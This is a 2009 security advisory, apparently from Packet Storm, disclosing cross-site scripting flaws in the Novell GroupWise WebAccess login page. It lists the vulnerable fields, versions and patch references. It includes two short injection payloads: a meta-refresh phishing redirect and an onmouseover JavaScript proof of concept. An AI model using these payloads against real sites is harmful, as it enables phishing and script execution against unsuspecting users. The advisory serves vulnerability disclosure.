Novell Groupwise Cross Site Scripting

2009-05-22T00:00:00
ID PACKETSTORM:77731
Type packetstorm
Reporter sasquatch
Modified 2009-05-22T00:00:00

Description

                                        
                                            ` Novell GroupWise Web Access Multiple XSS  
/============================================\  
/~ SecureState R&D Team - leroy and sasquatch ~\  
/~ Discovered: 11-24-08, 03-05-09 ~\  
\~ Vendor Notified: 01-06-09, 03-05-09 ~/  
\~ Vendor Publication: 05-21-09 ~/  
\============================================/  
  
  
/------------------------------------------------------------------------------------------------\  
/~ Novell's Groupwise WebAccess login page is vulnerable to several cross-site scripting attacks. ~\  
/~ ~\  
< Example URL: https://www.website.com/gw/webacc >  
\~ ~/  
\~ An attempt to deter the attack is made in that <script> tags are replaced with <!-- pt> ~/  
\------------------------------------------------------------------------------------------------/  
  
  
|--------------------------------------------------------------|  
| Vulnerable Fields: GWAP.version, User.Theme.index, User.lang |  
| Vulnerable Versions: 7.0.1, 7.0.3, ? |  
|--------------------------------------------------------------|  
| Vulnerable Fields: User.Lang |  
| Vulnerable Versions: 8.0, ? |  
|--------------------------------------------------------------|  
  
  
|------------------------------------------------------------------------------|  
| Phishing via URL Redirection: |  
| "/><meta http-equiv="refresh" content="0; url=http://www.securestate.com" /> |  
|------------------------------------------------------------------------------|  
| JavaScript Execution Proof of Concept: |  
| " /><div onmouseover="alert('xss')" style="javascript:visibility:visible;"> |  
|------------------------------------------------------------------------------|  
  
  
|--------------------------------------------------------------------------------|  
| Fix Info --> Technical Information Document 7003271 |  
| |  
| http://www.novell.com/support/search.do?usemicrosite=true&searchString=7003271 |  
|--------------------------------------------------------------------------------|  
| Version 7 --> 7.03 Hot Patch 2 |  
| Fixes vulnerable fields: GWAP.version, User.Theme, but not User.lang |  
|--------------------------------------------------------------------------------|  
| Version 8 (CVE-2009-1635) |  
|--------------------------------------------------------------------------------|  
`